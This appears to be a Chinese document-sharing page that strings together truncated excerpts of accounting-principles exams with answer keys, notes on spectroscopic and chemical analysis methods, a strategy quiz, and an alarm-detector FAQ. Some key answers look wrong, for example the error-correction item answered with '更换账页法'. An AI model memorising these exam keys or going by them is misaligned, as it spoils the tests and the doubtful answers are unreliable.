《会计学原理》课程复习资料 一、判断题: 1.及时性要求是指企业对于已经发生的交易或事项,应当及时进行确认、计量和报告,不得提前或延后。 [ ] 2.从法律的角度看,所有者权益对企业资产的要求权优于负债。 [ ] 3.将现金存入银行或提取现金的经济业务,一般只填制付款凭证。 [ ] 4.以权责发生制作为记账基础,当月收到的款项才作为当月的收入,当月没有收到的款项不能作为当月 的收入。 [ ] 5.营业外支出属于损益类项目。 [ ] 6.会计科目和账户一样,可以记录经济业务的增减变化及其结果。 [ ] 7.试算平衡表平衡不一定记账没有错误,试算平衡表不平衡,说明记账有错误,应进一步检查。[ ] 8.一般纳税人企业购入原材料时,发生的增值税进项税应计入“应交税费一应交增值税[进项税额]”账 户,不计入原材料的采购成本。 [ ] 9.付款凭证左上角“借方科目”处,应填写“库存现金”或“银行存款”科目。 [ ] 10.永续盘存制是通过实地盘点确定期末存货的结存数量。 [ ] 11.采用实地盘存制,账面上能够计算出结存数。 [ ] 12.复式记账就是对每项经济业务都必须记入两个账户。 [ ] 13.固定资产的盘盈大都是企业自制设备交付使用后未及时入账所造成的。 [ ] 14.会计科目与账户是一个概念的两个提法,它们是没有区别的。 [ ] 15.企业把应计入“管理费用”的费用计入了“制造费用”,它不会影响生产成本计算的正确性,因为二 者都属于生产费用。 [ ] 16.资产既包括过去的交易或事项形成的,也包括未来发生的交易或事项形成的经济资源。 [ ] 17.期末进行试算平衡时,全部资产类账户的本期借方发生额合计应当等于其贷方发生额合计。 [ ] 18.“有借必有贷,借贷必相等”的记账规则要求一个账户的借方发生额合计一定等于贷方发生额合计。[ ] 19.“待处理财产损溢”账户的借方登记财产物资的盘盈数和盘点毁损的转销数。 [ ] 20.资产负债表是反映企业一定期间的财务状况的会计报表。 [ ] 二、单项选择题: 1.下列哪项不属于企业的收入? [ ] A.销售商品所得收入 B.提供劳务所得收入 C.为第三方客户代收的款项 D.让渡资产使用权所得收入 2.企业发生的下列交易或事项中,会引起会计等式两边同增的是 [ ] A.预付材料款 B.赊购原材料 C.偿还银行借款 D.收回应收账款 3.某企业“预收账款”账户期末贷方余额为100 000元,本期共增加60 000元,减少80 000元,则该 账户的期初余额为 [ ] A.借方80 000元 B.贷方120 000元 C.借方120 000元 D.贷方80 000元 4.属于企业负债类账户的是 [ ] A.应收账款 B.预付账款 C.预收账款 D.所得税费用 5.“待摊费用”账户与“预提费用”账户是在( )前提下需要设置的账户。 [ ] A.会计主体 B.货币计量 C.会计分期 D.会计假设 6.引起负债内部两个项目此增彼减而负债总额不变的经济业务是 [ ] A.用短期借款偿还应付账款 B.收到投资者货币投资 C.收到外单位前欠货款 D.用银行存款支付投资者利润 7.会计科目是 [ ] A.会计报表的名称 B.会计报表的项目 C.会计档案的名称 D.会计要素的名称 8.下列项目中,属于自制原始凭证的是 [ ] A.购货发票 B.交款后的收据 C.领料单 D.收账通知 9.下列各项中,需要进行全面清查的是 [ ] A.更换出纳员 B.库存商品遭受火灾 C.企业改变隶属关系 D.应收账款发生坏账
各种仪器分析的基本原理
紫外吸收光谱UV 分析原理:吸收紫外光能量,引起分子中电子能级的跃迁 谱图的表示方法:相对吸收光能量随吸收光波长的变化 提供的信息:吸收峰的位置、强度和形状,提供分子中不同电子结构的信息 荧光光谱法FS 分析原理:被电磁辐射激发后,从最低单线激发态回到单线基态,发射荧光 谱图的表示方法:发射的荧光能量随光波长的变化 提供的信息:荧光效率和寿命,提供分子中不同电子结构的信息 红外吸收光谱法IR 分析原理:吸收红外光能量,引起具有偶极矩变化的分子的振动、转动能级跃迁 谱图的表示方法:相对透射光能量随透射光频率变化 提供的信息:峰的位置、强度和形状,提供功能团或化学键的特征振动频率 拉曼光谱法Ram 分析原理:吸收光能后,引起具有极化率变化的分子振动,产生拉曼散射 谱图的表示方法:散射光能量随拉曼位移的变化 提供的信息:峰的位置、强度和形状,提供功能团或化学键的特征振动频率 核磁共振波谱法NMR 分析原理:在外磁场中,具有核磁矩的原子核,吸收射频能量,产生核自旋能级的跃迁 谱图的表示方法:吸收光能量随化学位移的变化 提供的信息:峰的化学位移、强度、裂分数和偶合常数,提供核的数目、所处化学环境和几何构型的信息 电子顺磁共振波谱法ESR 分析原理:在外磁场中,分子中未成对电子吸收射频能量,产生电子自旋能级跃迁 谱图的表示方法:吸收光能量或微分能量随磁场强度变化 提供的信息:谱线位置、强度、裂分数目和超精细分裂常数,提供未成对电子密度、分子键特性及几何构型信息质谱分析法MS 分析原理:分子在真空中被电子轰击,形成离子,通过电磁场按不同m/e分离 谱图的表示方法:以棒图形式表示离子的相对峰度随m/e的变化 提供的信息:分子离子及碎片离子的质量数及其相对峰度,提供分子量,元素组成及结构的信息
会计学原理练习题答案和解析
《会计学原理》练习题答案及解析 一、单项选择题(50小题) 1、是过去的交易、事项形成并由企业拥有或者控制的资源,该资源预期会给企业带来经济利益的会计要素是(A)。 A.资产 B.负债 C.所有者权益 D.收入 解析:根据资产的定义可知答案是A。 2、2010年5月,企业向银行借款购买固定资产,表现为(B)。 A.一项资产增加,另一项资产减少 B.一项资产增加,另一项负债增加 C.一项资产减少,另一项负债增加 D.一项资产减少,另一项负债减少 解析:企业向银行借款购买固定资产的会计分录为: 借:固定资产 贷:长期借款 所以应该是一项资产增加,同时另一项负债增加。 3、某企业资产总额是300万元,负债100万元,在用银行存款偿还负债50万元后,又用银行存款购买固定资产100万元,则目前的资产总额是(A)。 A.250万元 B.150万元 C.200万元 D.300万元 解析:企业以银行存款偿还负债50万元,导致银行存款减少了50万元,而用银行存款购买固定资产100万元只是资产一增一减,资产总额不变,因此这两笔业务发生后,资产总额由300万元减至250万元。 4、2010年12月31日,某企业有资产500万元,负债300万元,所有者权益200万元,则该企业的资产负债率为(D)。 A. 150% B.40% C. 250% D.60% 解析:资产负债率=负债/资产=300/500=60% 5、某企业期末余额试算平衡表的资料如下:
则J账户(B)。 A.有借方余额32 500 B.有贷方余额32 500 C.有借方余额32 900 D.有贷方余额32 900 解析:根据试算平衡公式,借方余额=贷方余额,借方余额=86200,所以贷方余额也应等于86200,而K账户+ L账户=53700,贷方余额<借方余额,因此J账户的余额应在贷方,且等于86200-53700,因此应选B。 6、以下经济业务中,应填制转账凭证的是(D)。 A. 销售甲产品收入现金3000元 B.以现金2000元购买办公用品 C. 职工借支差旅费5000元 D.购入设备一台,价款60000元未付 解析:只有D项交易不涉及现金或银行存款,应填制转账凭证。 7、下列适合采用多栏式明细账格式核算的是(B)。 A.原材料 B.制造费用 C.应付账款 D.库存商品 解析:A和D应采用数量金额式,C应采用三栏式,只有B应采用多栏式。 8、借贷记账法下,“T”字账户的左边为(C)。 A.增加栏 B.减少栏 C.借方 D.贷方 解析:借贷记账法下,“T”字账户的左边为借,右边为贷。 9、会计的基本职能是(B)。 A.会计预测和会计决策 B.会计核算和会计监督 C.分析和考核 D.管理和控制 解析:会计的基本职能是核算与监督。 10、资产负债表中所有者权益的排列顺序是(B)。 A.未分配利润——盈余公积——资本公积——实收资本 B.实收资本——资本公积——盈余公积——未分配利润 C.实收资本——盈余公积——资本公积——未分配利润 D.资本公积——盈余公积——未分配利润——实收资本 解析:根据企业的资产负债表可知应选B。 11、企业支付给银行的手续费应该记入下列哪个账户?(D)
会计学原理试题
会计学原理》试卷1 一、单项选择题(每小题1分,计30分) 1、货币资金收付以外的业务应编制() ①收款凭证②付款凭证③转账凭证④原始凭证 2、下列原始凭证中属于外来原始凭证的有() ①提货单②发出材料汇总表③领料单④购货发票 3、“四柱清册”的平衡关系是指() ①旧管+新收=开除+实在②旧管—新收=开除—实在 ③旧管+开除=新收+实在④旧管-开除=新收-实在 4、下列经济业务中,能引起资产和负债同时减少的是() ①收回货款②以存款归还借款③分配利润④从银行借款 5、负债类账户的结构是() ①借方登记增加,贷方登记减少,余额一般在借方。 ②借方登记减少,贷方登记增加,余额一般在借方。 ③借方登记增加,贷方登记减少,余额一般在贷方。 ④借方登记减少,贷方登记增加,余额一般在贷方。 6、下列()不是会计核算的专门方法。 ①设置会计科目②编制会计报表③资产清理④填制和审核凭证 7、下列会计账户中属于资产类的是() ①应付票据②预付账款③实收资本④预收账款 8、会计分期是从()前提(假设)中引申出来的。 ①持续经营②会计主体③货币计量④权责发生制
9、购进材料未付款时,这笔未结算的款项应作为一项()加以确认。 ①资产②负债③费用④收入 10、企业支付借款利息费用时,应贷记()账户。 ①财务费用②待摊费用③预提费用④银行存款 11、债务结算账户的借方登记() ①债权的减少数②债权的增加数③债务的减少数④债务的增加数 12、损益表是反映企业在一定时期内()的报表。 ①经营成果及其分配情况②财务状况和盈利能力 ③营业利润、利润总额④营业收入、营业利润、利润分配 13、科目汇总表核算组织程序() ①不反映各个科目的对应关系 ②能清楚地反映多个科目的对应关系 ③在多数情况下可以反映科目的对应关系 ④在某些情况下反映科目的对应关系 14、记录实物盘点结果,反映财产物资实存数的原始凭证是() ①各种财产物资的明细账②银行存款余额调节表 ③盘存单④账存实存对比表 15、由于债务人消失,使企业没有办法偿还的款项,一般应记入() ①应付账款②营业收入③其他业务收入④预收帐款 16、《会计法》规定财务会计报告的真实性、完整性由()。 ①单位会计主管人员负责②总会计师负责 ③由编制财务会计负责④单位负责人负责 17、资产和权益之间的关系是()
企业战略与经营决策
第一章企业战略与经营决策 一、单项选择题 1.企业战略是指企业在市场经济竞争激烈的环境中,在总结历史经验、调查现状、预测未来的基础上,为谋求生存和发展而作出的()的谋划或方略。 A.长远性、全局性 B.长远性、科学性 C.全局性、指导性 D.长远性、指导性 2.企业战略最根本的特征是()。 A.长期性 B.全局性 C.灵活性 D.风险性 3.企业最高管理层指导和控制企业一切行为的最高行动纲领是()。 A.企业部门战略 B.企业业务战略 C.企业职能战略 D.企业总体战略 4.企业战略层次中,主要解决资源利用效率问题,使企业资源利用效率最大化的是()。A.企业总体战略 B.企业业务战略 C.企业职能战略 D.竞争战略 5.战略管理的最高任务是()。 A.提高企业的市场占有率 B.追求企业利润最大化 C.实现特定阶段的战略目标 D.实现企业的使命 6.战略环境分析不包括()。 A.宏观环境分析 B.行业环境分析C.中观环境分析 D.企业内部环境分析 7.构成科技环境的首要因素是()。 A.科技体制 B.社会科技力量 C.社会科技水平 D.国家的科技政策与立法 8.行业生命周期分为四个阶段,市场营销和生产管理是()的关键性职能。 A.形成期 B.成长期 C.成熟期 D.衰退期 9.新的竞争对手进入市场会对现有企业构成威胁,这种威胁的大小不依()而定。 A.现有企业的反应程度 B.进入市场的障碍 C.市场潜力 D.产业内竞争的程度 10.企业制定战略的出发点、依据和条件是 () A.企业内部环境 B.企业宏观环境 C.行业环境 D.战略环境 11.企业价值链由主体活动和辅助活动构成,下列不属于辅助活动的是() A.企业基础管理 B.人力资源管理 C.生产加工 D.技术开发 12.在SWOT分析模型中,当企业处于WO象限时,可以采取()。 A.增长型战略 B.紧缩型战略 C.一体化战略 D.扭转型战略
会计学原理模拟试题复习资料一
会计学原理模拟试题(一) 一、单项选择题(下列各题的四个备选答案中有一个是正确的,请把正确答案选出并将 其序号填在题干后面的括号内。每小题 1 分,共 10 分。) 1 、会计的最基本的职能是(B ) A 、监督职能 B 、反映职能 C 、考核职能 D 、控制职能 2 、引起资产和负债同时减少的经济业务是(D ) A 、以银行存款购入材料一批 B 、以银行借款偿还应付帐款 C 、将现金存入银行 D 、以银行存款偿还银行借款 3 、传统的会计主要是(A ) A 、记帐、算帐、报帐 B 、考核、预测、分析 C 、预测、决策、分析 D 、考核、控制、评价 4 、在会计年度内企业把资本性支出按收益性支出处理其后果是( D ) A 、本年度利润增值和所有者权益减少 B 、本年度利润减少和负债减少 C 、本年度利润降低和资产价值减少 D 、本年度降低至于出现亏损和资产价值偏低 5 、“制造费用”帐户按用途和结构分类属于(D ) A 、盘存帐户 B 、成本计算帐户 C 、费用帐户 D 、集合分配帐户 6 、下列帐户中反映资产的帐户是(C ) A 、“实收资本”帐户 B 、“长期借款”帐户 C 、“累计折旧”帐户 D 、“本年利润”帐户 7 、下列会计凭证中属于原始凭证的是( D) A 、收款凭证 B 、付款凭证 C 、转帐凭证 D 、发料凭证汇总表 8 、记帐以后,发现记帐凭证和帐属记录中所记金额大于应记金额,但记帐凭证中应借、应贷会计科目并无错误,更正时应采用(A ) A 、红字更正法 B 、补充登记法 C 、划线列正法 D 、横线登记法 9 设置帐户、复式记帐和编制资产负债表的理论依据是( C ) A 会计假定 B 会计一般原则 C 资产和权益的平衡关系 D 、借贷平衡关系 10 、会计核算中用来总括反映企业一定时期内财务状况和经营成果的专门方法是(D ) A 设置帐户 B 成本计算 C 登记帐薄 D 编制会计报表 二、多项选择题(下列各题的五个备选答案中有两个以上是正确的,将正确答案选出并将其序号填入题干后面的括号内,多选少选该题均不得分。每小题 1.5 分,共 15 分) 1 、在汇总记帐凭证核算形式下,总分类帐登记的依据是(BCD ) A 、原始凭证汇总表 B 汇总收款凭证 C 、汇总付款凭证 D 汇总转帐凭证 E 、科目汇总表 2 、作为会计主体,必须具备的条件是(ACE ) A 具有一定数量的资金 B 必须是持续经营 C 进行独立的生产经营活动或其他活动 D具有一定数量的会计人员 E 实行独立核算 3 、所有者权益是企业投资人对企业净资产的所有权,包括(ABCE ) A 、投入资本 B 、资本公积金 C 、盈余公积金 D 、长期借款 E 、未分配利润 4 、在借贷记帐法下,期末结帐以后,一般有余额的帐户有(ABE )
常见的化学成分分析方法及其原理98394
常见的化学成分分析方法 一、化学分析方法 化学分析从大类分是指经典的重量分析和容量分析。重量分析是指根据试样经过化学实验反应后生成的产物的质量来计算式样的化学组成,多数是指质量法。容量法是指根据试样在反应中所需要消耗的标准试液的体积。容量法即可以测定式样的主要成分,也可以测定试样的次要成分。 重量分析 指采用添加化学试剂是待测物质转变为相应的沉淀物,并通过测定沉淀物的质量来确定待测物的含量。 容量分析 滴定分析主要分为酸碱滴定分析、络合滴定分析、氧化还原滴定分析、沉淀滴定分析。 酸碱滴定分析是指以酸碱中和反应为原理,利用酸性标定物来滴定碱性物质或利用碱性标定物来滴定酸性待测物,最后以酸碱指示剂(如酚酞等)的变化来确定滴定的终点,通过加入的标定物的多少来确定待测物质的含量。 络合滴定分析是指以络合反应(形成配合物)反应为基础的滴定分析方法。如EDTA与金属离子发生显色反应来确定金属离子的含量等。络合反应广泛地应用于分析化学的各种分离与测定中,如许多显色剂,萃取剂,沉淀剂,掩蔽剂等都是络合剂,因此,有关络合反应的理论和实践知识,是分析化学的重要内容之一。 氧化还原滴定分析:是以溶液中氧化剂和还原剂之间的电子转移为基础的一种滴定分析方法。氧化还原滴定法应用非常广泛,它不仅可用于无机分析,而且可以广泛用于有机分析,许多具有氧化性或还原性的有机化合物可以用氧化还原滴定法来加以测定。通常借助指示剂来判断。有些滴定剂溶液或被滴定物质本身有足够深的颜色,如果反应后褪色,则其本身就可起指示剂的作用,例如高锰酸钾。而可溶性淀粉与痕量碘能产生深蓝色,当碘被还原成碘离子时,深蓝色消失,因此在碘量法中,通常用淀粉溶液作指示剂。 沉淀滴定分析:是以沉淀反应为基础的一种滴定分析方法,又称银量法(以
会计学原理考试试题与答案(doc 11页)
会计学原理考试试题与答案(doc 11页)
()8、“固定资产”账户是“累计折旧”账户的调整账户。 ()9、对于现金和银行存款之间的相互转换,一般只编制付款凭证。 ()10、自制原始凭证必须有经办单位负责 人或其他指定人员签名或盖章,对外 开出的原始凭证,必须加盖本单位公 章。 ()11、发现由于记账凭证少记了金额而导 致账簿中少记金额时,可以不填制记 账凭证,而直接在账簿中补记少记的 金额。 ()12、对账的主要内容包括账证核对、账账核对,不包括账实核对和账表核对。 ()13、某企业仓库被盗,为查明损失决定 立即进行盘点,按照财产清查的范围 应属于局部清查,按照清查的时间应 属于不定期清查。 ()14、虽然资产负债表中的项目,有些是 根据账簿记录直接填列,有些是根据 账簿记录计算填列,但它们共同之处 都是来源于账簿的期末余额。
()15、账务处理程序不同,现金日记账、银行存款日记账的登账依据也不同。 二、单项选择题(共15分,每小题1分) ()1、下列项目中,引起负债和所有者权益有增有减的经济业务是。 A、购入材料货款未付 B、以银行存款偿还应付账款 C、从税后利润中提取盈余公积 D、将应付债券转作实收资本 ()2、某企业资产总额350万元,如果发生以下经济业务:(1)收到外单位投资 20万元存入银行;(2)以银行存款 支付购入材料16万元;(3)以银行 存款偿还银行借款5万元,则企业资 产总额应为。 A、368万元 B、354万元 C、374万元 D、365万元()3、总分类账与明细分类账平行登记的要点可以概括为。 A、依据相同,方向一致,金额相等 B、方向一致,颜色相同,金额相等
《会计学原理》期末B试题及答案.DOC
《会计学原理》期末试题及答案 一、单项选择题(在每小题列出的4个选项中只有一个是符合题意的,请将正确选项前的字母填在题后的括号内。每小题1分,共15分) 1.会计的基本职能是( C) A.预测和决策 B.控制和考核 C.反映和监督 D.分析和判断 2.会计主体是指会计所服务的( A ) A.特定单位 B.投资者 C.债权人 D.管理当局 3.凡支出的效果与几个会计年度相关的,应作为( C ) A.营业外支出 B.收益性支出 C.资本性支出 D.税后利润支出 4.某项经济业务使固定资产和实收资本同时增加,该项经济业务应表述为( D )A.购入全新的固定资产 B.出售全新的固定资产 C.用固定资产对外投资 D.接受投资人的固定资产投资 5.对应收账款计提坏账准备的依据是( D ) A.客观性原则 B.划分资本性支出和收益性支出原则 C.及时性原则 D.谨慎性原则 6.把账户分为借贷两方,哪一方记增加数,哪一方记减少数,要根据( D ) A.记账规则 B.记账形式 C.核算方法 D.账户反映的经济内容 7.标明某项经济业务应借、应贷账户及其金额的记录称为( c ) A.记账凭证 B.记账方法 C.会计分录 D.会计方法 8.将会计凭证划分为原始凭证和记账凭证两大类的依据是( C ) A.填制的时间 B.填制的方法 C.填制的程序和用途 D.凭证反映的经济内容 9.在一定时期内连续记载许多同类经济业务的会计凭证,称为( B ) A.原始凭证汇总表 B.累计凭证 C.汇总凭证 D.复式凭证 10.在采用收款凭证、付款凭证和转账凭证的情况下,涉及到现金和银行存款之间的划转业务,按规定( B ) A.只填收款凭证 B.只填付款凭证 C.既填收款凭证又填付款凭证 D.只填转账凭证 11.平行登记法是指同一项经济业务在( B ) A.汇总凭证与有关账户之间登记 B.各有关总分类账户中登记 C.各有关明细分类账户中登记 D.总账及其所属明细账户之间登记 12.在结账之前,如果发现账簿记录有错误,而记账凭证填制正确,更正时可用( D ) A.红字更正法 B.划线更正法 C.补充登记法 D.更换账页法 13.银行存款清查的方法是( C ) A.实地盘点法 B.技术推算 C.与银行核对账目 D.函证核对法 14.总括反映企业在一定会计期间内利润实际形成情况的会计报表,称为( B ) A.资产负债表 B.利润表 C.利润分配表 D.现金流量表 15.年度会计报表的保管期限为( D )
仪器分析简答题
11.原子吸收谱线变宽的主要因素有哪些? 一方面是由激发态原子核外层电子决定,如自然宽度;一方面是由于外界因素,多普勒变宽,碰撞变宽,场致变宽,压力变宽、自吸变宽、电场变宽、磁场变宽等。 1.自然宽度:谱线固有宽度,与原子发生能级间跃迁的激发态原子的有限寿命有关。可忽 略 2.多普勒变宽:由于无规则的热运动而变化,是谱线变宽主要因素。 3.压力变宽:由于吸光原子与蒸汽中原子相互碰撞而引起能级的微小变化,使发射或吸收的光量子频率改变而变宽。与吸收气体的压力有关。包括洛伦兹变宽和霍尔兹马克变宽。场致变宽:在外界电场或磁场作用下,原子核外层电子能级分裂使谱线变宽。 自吸变宽:光源发射共振谱线被周围同种原子冷蒸汽吸收,使共振谱线在V0 处发射强度 减弱所产生的谱线变宽。 原子吸收谱线变宽主要原因是受多普勒变宽和洛伦兹变宽的影响 12.说明荧光发射光谱的形状通常与激发波长无关的原因。 由于荧光发射是激发态的分子由第一激发单重态的最低振动能级跃迁回基态的各振动能级所产生的,所以不管激发光的能量多大,能把电子激发到哪种激发态,都将经过迅速的振动弛豫及内部转移跃迁至第一激发单重态的最低能级,然后发射荧光。因此除了少数特殊情况,如S1 与S2 的能级间隔比一般分子大及可能受溶液性质影响的物质外,荧光光谱只有一个发射带,且发射光谱的形状与激发波长无关。 13.有机化合物产生紫外-可见吸收光谱的电子跃迁有哪些类型? 在有机分子中存在σ、π、n三种价电子,它们对应有σ-σ*、π-π*及n 轨道,可以产 生以下跃迁: 1.σ-σ* 跃迁:σ-σ*的能量差大所需能量高,吸收峰在远紫外(<150nm)饱和烃只有σ- σ*轨道,只能产生σ-σ*跃迁,例如:甲烷吸收峰在125nm;乙烷吸收峰在135nm ( < 150nm) 2.π-π*跃迁:π-π*能量差较小所需能量较低,吸收峰紫外区(200nm左右)不饱和烃类分子中有π电子,也有π* 轨道,能产生π-π*跃迁:CH2=CH2,吸收峰165nm。(吸收系数大,吸收强度大,属于强吸收) 1.n-σ*跃迁:n-σ*能量较低,收峰紫外区(200nm左右)(与π-π*接近)含有杂原子团如:-OH,-NH2 ,-X,-S 等的有机物分子中除能产生π-π*跃迁外,同时能产生n-σ*跃迁4. n-π*跃迁:n-π*能量低吸收峰在近紫外可见区(200 ~ 700nm)含杂原子的不饱和基团,如- C=O,-CN 等 各种跃迁所需能量大小次序为:σ-σ*> n-σ*>π-π*>n-π* 除外分子内部还有电荷迁移跃迁,指用电磁辐射照射化合物时,电子从给予体向接受体相 联系的轨道上跃迁,实质是氧化还原过程,相应的光谱最大特点是摩尔吸光系数较大。14、简单说明紫外-可见吸收光谱法、荧光光谱法、原子吸收光谱法的定量原理和依据是什么?请画出紫外分光光度法仪器的组成图(即方框图),并说明各组成部分的作用? 答:作用: 光源:较宽的区域内提供紫外连续电磁辐射。 单色器:能把电磁辐射分离出不同波长的成分。 试样池:放待测物溶液 参比池:放参比溶液
会计学原理期末考试题B卷及答案
会计学原理期末考试题(B卷) 1、单项选择题(每题1分,共20分) 1.下列不属于会计信息质量基本要求的是()。 A.可靠性原则 B.谨慎性原则 C.货币计量原则 D.可比性原则 2.计提坏账准备是体现()要求。 A.可靠性原则 B.谨慎性原则 C.配比原则 D.相关性原则 3.某企业期初资产总额100000元,负债总额40000元,所有者权益总额60000元,本期取得收入30000元,发生费用20000元,负债总额不变,则期末资产总额为()。A.130,000B.110,000C.80,000D.70,000 4.下列引起资产和负债同时增加的经济业务是()。 A.以银行存款偿还银行借款B.收回应收账款存入银行C.购进材料一批货款未付D.以银行借款偿还应付账款 5.所有者权益是企业投资者对企业净资产的所有权,在数量上等于() A.全部资产减去全部所有者权益B.全部资产减去全部负债 C.全部净资产减去全部所有者权益D.全部净资产减去全部负债 6.下列各项中()在同一方向。 A.减少额和贷方发生额B.增加额和贷方发生额 C.增加额和余额D.贷方发生额和余额 7.下列各项中,属于资产类会计科目的是()。 A.应付账款B.应收账款C.本年利润D.财务费用 8.下列各项中,属于反映企业所有者权益类账户的有()。 A.资本公积B.固定资产C.短期借款D.生产成本 9.下列各项中,不属于资产类账户的有()。 A.银行存款B.原材料C.实收资本D.应收账款 10.下列各项中属于流动资产的是()。 A.库存现金B.运输设备C.专利权D.厂房 11.企业计提短期借款利息时,应贷记的账户是()。 A.“银行存款”B.“应付利息”C.“库存现金”D.“财务费用” 12.预付给供应单位材料货款,应将其视为一种()。 A.负债B.所有者权益C.收入D.资产
各种探测器介绍说明资料讲解
报警系统由哪几部分组成? 简单的报警系统由前端探测器、中间传输部分和报警主机组成。大一些的系统也可将探测器和报警主机看做是前端部分,从报警主机到接警机之间是传输部分,中心接警部分看做是后端部分。 报警系统按信息传输方式不同,可分哪几种? 按信息传输方式不同,从探测器到主机之间可分为有线和无线2种。从主机到中心接警机之间也可分为有线和无线2种,其中有线系统还可分为基于电话线传输和基于总线传输2种类型。 探测器分为哪几种类型?市面上常见的有哪些类型? 红外、微波、震动、烟感、气感、玻璃破碎、压力、超声波等等。其中红外探测器还可分为主动红外和被动红外,烟感还可分为离子式和光电式。市面上常见的有红外探测器(被动红外)、对射、栅栏(主动红外)、双鉴探测器、震动探测器、玻璃破碎探测器。 主动红外探测器的工作原理? 主动红外探测器由红外发射器和红外接收器组成。红外发射器发射一束或多数经过调制过的红外光线投向红外接收器。发射器与接收器之间没有遮挡物时,探测器不会报警。有物体遮挡时,接收器输出信号发生变化,探测器报警。 被动红外探测器工作原理? 被动红外探测器中有2个关键性元件,一个是菲涅尔透镜,另一个是热释电传感器。自然界中任何高于绝对温度(-273o)的物体都会产生红外辐射,不同温度的物体释放的红外能量波长也不同。人体有恒定的体温,与周围环境温度存在差别。当人体移动时,这种差别的变化通过菲涅尔透镜被热释电传感器检测到,从而输出报警信号。 微波探测器工作原理? 微波探测器应用的是多普勒效应原理。在微波段,当以一种频率发送时,发射出去的微波遇到固定物体时,反射回来的微波频率不变,即f发=f收,探测器不会发出报警信号。当发射出去的微波遇到移动物体时,反射回来的微波频率就会发生变化,即f发≠f收,此时微波探测器将发出报警信号。 什么是双元红外探测器?什么是四元红外探测器?
会计学原理考试试题及答案A
会计学原理试题及答案A 一、判断题(对的写T,错的写F。共15分,每小题1分) ()1、会计的职能只有两个,即核算职能和监督职能。 ()2、会计要素中既有反映财务状况的要素,也有反映经营成果的要素。 ()3、一项经济业务的发生引起负债的增加和所有者权益的减少,会计基本等式的平衡关系不受其影响。()4、在借贷记账法下,账户的借方登记增加数,贷方登记减少数。 ()5、所有账户都是根据会计科目开设的,包括总账账户和明细账户。 ()6、企业生产用固定资产计提折旧时应直接记入“制造费用”账户。 ()7、对于资产负债结算账户,可以根据其余额的方向来判断其性质。 ()8、属于所有者权益类的所有账户,它们的用途和结构都是相同的。 ()9、收款凭证和付款凭证不仅是记账的依据,而且也是出纳员办理收款、付款业务的根据。 ()10、除结账和更正错误的记账凭证可以不附原始凭证外,其他记账凭证必须附有原始凭证,并注明所附原始凭证的张数。 ()11、“生产成本”账户按用途和结构分类,应属于盘存或成本计算账户。 ()12、会计人员在填制记账凭证时,误将9 800写为8 900,并已登记入账。月终结账前发现错误,更正时应采用划线更正法。 ()13、无论采用永续盘存制还是实地盘存制,都需要对财产物资进行清查,都可以采用实地盘点的方法。()14、在任何情况下,应收账款项目都是根据应收账款总账的期末余额填制。 ()15、采用科目汇总表账务处理程序,总分类账、明细分类账和日记账都应根据科目汇总表登记。 二、单项选择题(共15分,每小题1分) ()1、下列项目中,引起负债有增有减的经济业务是。 A、以银行存款偿还银行借款 B、用银行借款抵付应付账款 C、以银行存款上交税金 D、收到外商捐赠的设备 ()2、收到某单位预付货款存入银行,所引起的变动为。 A、一项资产增加,一项负债增加 B、一项资产减少,一项负债减少 C、一项资产增加,一项所有者权益增加 D、一项资产减少,一项所有者权益减少 ()3、某企业销售产品一批,部分货款收存银行,部分货款对方暂欠,该企业应填制。 A、收款凭证和付款凭证 B、收款凭证和转账凭证 C、付款凭证和转账凭证 D、两张转账凭证 ()4、下列不能作为会计核算依据的是。 A、领料单 B、发货票 C、经济合同 D、入库单 ()5、如果发现记账凭证所用的科目正确,只是所填金额大于应填金额,并已登记入账,应采用更正。 A、划线更正法 B、红字更正法 C、平行登记法 D、补充登记法 ()6、在下列账簿中,需要进行日清月结的账簿是。 A、备查账簿 B、现金日记账 C、总分类账 D、明细分类账 ()7、财产清查中,如财产的盘亏是由于保管人员失职所造成的,则应计入。 A、管理费用 B、生产成本 C、其他应收款 D、营业外支出 ()8、在记账无误的情况下,银行对账单与企业银行存款日记账账面余额不一致是因 造成的。 A、应付账款 B、未达账项 C、坏账损失 D、应收账款 ()9、下列属于外来原始凭证。 A、领料单 B、购货发票 C、收料单 D、工资结算汇总表
第六讲分光光度法
吸光光度分析法 大纲要求: 1.掌握吸光光度分析法的特点、基本原理、测定方法和计算方法; 2.理解物质对光的选择性吸收和光吸收曲线; 3.掌握朗伯一比耳定律的应用及摩尔吸光系数,了解引起偏离朗伯 一比耳定律的原因; 4.了解分光光度计的主要部件,各部件的作用及仪器的工作原理; 5.了解显色反应的特点,掌握显色条件的选择; 6.掌握分光光度法的应用和测量条件的选择。 基本内容: 一、吸光光度分析概述 基于物质对光的选择性吸收而建立的分析方法称为吸光光度法,包 括比色法,可见分光光度法及紫外分光光度法等。 有些物质的溶液是有色的,若物质的溶液本身是无色或浅色的,但 它们与某些试剂发生反后生成有色物质。有色物质溶液颜色的深浅与其 浓度有关,浓度愈大,颜色愈深。如果是通过与标准色阶比较颜色深浅 的方法确定溶液中有色物质的含量,则称为目视比色法,如果是使用分 光光度计,利用溶液对单色光的吸收程度确定物质含量,则称为分光光 度法。 吸光光度法主要用于测定试样中的微量组分,具有以下特点: a.灵敏度高。常可不经富集用于测定质量分数为10-2~10-5的微量组 分,甚至可测定低至质量分数为10-6~10-8的痕量组分。通常所测试的浓 度下限达10-5~10-6mol·L-1。 b.准确度高。一般目视比色法的相对误差为5%~10%,分光光度法为 2%~5%。 c.应用广泛。几乎所有的无机离子和许多有机化合物都可以直接或 间接地用分光光度法进行测定。 d.仪器简单、操作方便、快速。 二、吸光光度分析的基本原理 1、光的基本性质 光是一种电磁波,同时具有波动性和微粒性。 我们将眼睛能够感觉到的那一段的光称为可见光,也就是我们日常所
会计学原理考试试题及答案
《会计学原理》试题及答案 一、单项选择题 1.会计主体是指会计所服务的( A ) A.特定单位 B.投资者 C.债权人 D.管理当局 2.会计的基本职能是( C ) A.预测和决策 B.控制和考核 C.反映和监督 D.分析和判断 3.凡支出的效果与几个会计年度相关的,应作为( C ) A.营业外支出 B.收益性支出 C.资本性支出 D.税后利润支出 4.某项经济业务使固定资产和实收资本同时增加,该项经济业务应表述为( D )A.购入全新的固定资产 B.出售全新的固定资产 C.用固定资产对外投资 D.接受投资人的固定资产投资 5.对应收账款计提坏账准备的依据是( D ) A.客观性原则 B.划分资本性支出和收益性支出原则 C.及时性原则 D.谨慎性原则 6.把账户分为借贷两方,哪一方记增加数,哪一方记减少数,要根据( D )A.记账规则 B.记账形式 C.核算方法 D.账户反映的经济内容 7.标明某项经济业务应借、应贷账户及其金额的记录称为( c ) A.记账凭证 B.记账方法 C.会计分录 D.会计方法 